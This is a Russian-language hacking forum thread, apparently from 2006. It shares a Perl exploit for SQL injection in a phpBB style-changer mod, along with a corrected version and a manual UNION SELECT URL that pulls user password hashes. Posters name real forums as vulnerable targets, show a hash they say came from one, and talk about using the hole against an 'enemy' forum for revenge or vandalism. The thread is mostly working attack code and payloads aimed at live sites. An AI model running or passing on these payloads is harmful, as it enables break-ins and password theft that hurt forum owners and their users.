Окуеть уже до 19 дошли...
собственно вот линк _http://www.milw0rm.com/id.php?id=1469
а вот код

#!/usr/bin/perl
################################################## #######
# _______ _______ ______ #
# |______ |______ | \ #
# ______| |______ |_____/ #
# #
#phpBB Style Changer/Demo Mod-->GET HASH EXPLOIT #
#Created By SkOd #
#SED security Team #
#http://www.sed-team.be #
#skod.uk@gmail.com #
#ISRAEL #
################################################## #######
#google:
#"Powered by phpBB" inurl:"index.php?s" OR inurl:"index.php?style"
################################################## #######
use IO::Socket;
if (@ARGV < 3){
print q{
################################################## ##########
# phpBB Style Changer\Viewer MOD SQL injection Exploit #
# Tested on phpBB 2.0.19 #
# created By SkOd. SED Security Team #
################################################## ##########
bbstyle.pl [HOST] [PATH] [Target id]
bbstyle.pl www.host.com /phpbb2/ 2
################################################## ##########
};
exit;
}
$serv = $ARGV[0];
$dir = $ARGV[1];
$id = $ARGV[2];
print "[+]Make Connection\n";
$serv =~ s/(http:\/\/)//eg;
$path = $dir.'index.php?s=-99%20UNION%20SELECT%20null,user_password,null,null ,null,null,null,null,null,null,null,null,null,null ,null,null,null,null,null,null,null,null,null,null ,null,null,null,null,null,null,null,null,null,null ,null,null,null,null,null,null,null,null,null%20FR OM%20phpbb_users%20Where%20user_id='.$id.'/*';
$socket = IO::Socket::INET->new( Proto => "tcp", PeerAddr => "$serv", PeerPort => "80") || die "[-]Connect Failed\r\n";
print $socket "GET $path HTTP/1.1\n";
print $socket "Host: $serv\n";
print $socket "Accept: */*\n";
print $socket "Connection: close\n\n";
print "[+]Connected\n";
while ($hash = <$socket>){
$hash =~ m/open(.*?)template/ && print "[+]User id: $id\n[+]Md5 Hash: $1\n";
}

# milw0rm.com [2006-02-05]

shto ta nefuric4it kak nado


C:\>c:\perl\bin\perl.exe c:\bb2.pl http://******* /forums/ 2
[+]Make Connection
[+]Connected


i sjo poslje etovo

у кого пахало?Я около 15 пробовал не пашет пока

Я незнаю как сплоит, я вручную все делал, работает на ура, у кого руки растут от ушей посвещаеться вот вам форум бажный
http://www.phpbbhacks.com/templatesdemo/
http://www.extremepixels.net/phpbb/
да и ваще их полно в гугле, монстр респект

да вручную всё прекрасно работает!)))

Работает на все 100% =)

У кого не работает, вы из форума копировали сплойт?

да)))

Ошибка В Exploit-е есть =)) Ну что парни кто не любит в Ручную ищите Ошибку в Скрипте =))

Всё работает на ура, всё нормально

о спасибо лимпопо, действительно ошибка =)))
вот быстренько исправил, у кого руки не из задницы поймут

while ($hash = <$socket>){
$hash =~ m/open(.*?)template/ ;
$pass=$1;
}
print "[+]User id: $id\n[+]Md5 Hash: $pass\n";

Рабочая верcия Выглядит так!
perl phpbb19.pl http://www.extremepixels.net /phpbb/
[+]Make Connection
[+]Connected
[+]User id: 2
[+]Md5 Hash: 12d187897ee09aa0900af90c29f0936c


Вуаля =))

Вручную юзается хорошо. Но не везде работает=(
На многих форумах ничего не происходит=(

Значит пропатчины или Другая версия phpbb

Видимо...
Но тестил на локал хосте. Версия 100% 2.0.19.
Ничего не происходит. Никакие патчи вроде не ставлены. Версия оригинальная.
На приведённых в топике форумах всё работает.
Хм... Странновато малость. Или я ламмерю?

ошибка же не в форуме а в моде

Люди, скажите пожалуйста, как его запустить на перле? У меня установлен ActivePerl 5.8.3

имхо, юзайте вручную, запарили ныть уже)))

zaivi d cmd -> i napishi perl lalala.pl

Вручную проще! Работает классно.
А он тока на 19 работает?

Dron-anarchy походу тока на 19!а жаль)))

ну а вам какая разница нах?=)) тем более на многих стоит 19)) да действительно там ошыпка имхо могли бы и из линка взять тоже мине ) и за репу многим спасиБо+)

сорри скиньте в пм линк на бажный форум, для теста... :rolleyes:

index.php?s=-99%20UNION%20SELECT%20null,user_password,null,null ,null,null,null,null,null,null,null,null,null,null ,null,null,null,null,null,null,null,null,null,null ,null,null,null,null,null,null,null,null,null,null ,null,null,null,null,null,null,null,null,null%20FR OM%20phpbb_users%20Where%20user_id=2/*
Вот это вручную!!!

причём, уберите пробелы лишние в запросе, когда писать его будете! Fr Om - это From! =)

все разобрался спасибо, но форумов маловато =(

За сплойт спасибки ручками юзается на отлично :d
Только реально я нарыл токо пару форумов которые ломаются а остальные никак!

Inferno - Значит версии Другии =)) Рузами всегда хорошо работаеться =)) Чем бажными Скриптами =))

m0nzt3r спасибо за исправление ошибки)

Это не работает на стандартном 2.0.19 Только с бажной модификацией. Это уязвимость не версии форума а мода. А дырявые моды для phpbb есть и другие. Фотоальбом Коппермайна например (тоже не обновленный) и др. Но это всё редко встречается

Это не работает на стандартном 2.0.19 Только с бажной модификацией. Это уязвимость не версии форума а мода. А дырявые моды для phpbb есть и другие. Фотоальбом Коппермайна например (тоже не обновленный) и др. Но это всё редко встречается
Реально я уже перерыл больше сотни и токо на 2х работает эта бага!

Это не работает на стандартном 2.0.19 Только с бажной модификацией. Это уязвимость не версии форума а мода. А дырявые моды для phpbb есть и другие. Фотоальбом Коппермайна например (тоже не обновленный) и др. Но это всё редко встречается
Это я слепой или ты ????
где ты здесь мод увидел ????

Может быть разные релизы phpBB 2.0.19 к примеру там за другой месяц или ещё что-то там но никак не уязвимость модов....

У меня трёт аж на ура....

Редкая кнешна бага, но всё ж работает. Молоца.

Это я слепой или ты ????


не я

где ты здесь мод увидел ????
А в сплоите по-русски написано:
phpBB Style Changer/Demo Mod-->GET HASH EXPLOIT :)
Вот он и работает только там, где этот стайл ченджер установлен

Врубился уже.
Мало где это стоит=(

Попробывал , с исправлением сплойта от K1borg'а , пишет
[+]Make Connection
[+]Connected
[+]User id: 2
[+]Md5 Hash: пусто .
Почему может быть ? Пробую на http://forum.sfaction.net , или на http://allgsm.com.ru/forum/ , не на одном не прет .

Попробывал , с исправлением сплойта от K1borg'а , пишет
[+]Make Connection
[+]Connected
[+]User id: 2
[+]Md5 Hash: пусто .
Почему может быть ? Пробую на http://forum.sfaction.net , или на http://allgsm.com.ru/forum/ , не на одном не прет .

Ну тебе же русским языком объяснили и разжевали, что сплоит работает на форумах где стоит бажный мод Style Changer\Viewer
Для справки: этот мод позволяет менять скин для форума прямо с главной страницы не заходя в настройки профиля.

А вообще, как уже предлагали выше, пользуйся вручную
http://somesite/someforum/index.php?s=-99%20UNION%20SELECT%20null,user_password,null,null %20%20%20%20,null,null,null,null,null,null,null,nu ll,null,null%20%20%20%20,null,null,null,null,null, null,null,null,null,null%20%20%20%20,null,null,nul l,null,null,null,null,null,null,null%20%20%20%20,n ull,null,null,null,null,null,null,null,null%20FROM %20phpbb_users%20Where%20user_id=2/*

Где последняя цифра в коде - это Id пользователя, сейчас там стоит 2

Так что enjoy ;)

Блин жаль что не везде работает! Покачто ещё не 1 форума не нашёл где стоит эта шляпа! :rolleyes:

Да уж не самый удачный сплойт для пхпбб,кста вышла новая пага-всем СМОТРЕТЬ (http://www.securityinfo.ru/2006/02/__phpbb_2019_1.html#more)
Думаю,что для неприятельского форума самое,то.Да и дырка будет еше долго жить)

Интересный сплойт. Но только для вандализма =(.
Кроме мести ничего интересного.

Вот я пробую все форуми подряд и нифига даже вручную. :(
попробуйте даже етот форум __http://forum.krapka.te.ua/

ну незнаю у меня не работаєт даже вручную перебрал кучу форумов и ничего попробуйте етот вийдет ли __http://forum.krapka.te.ua/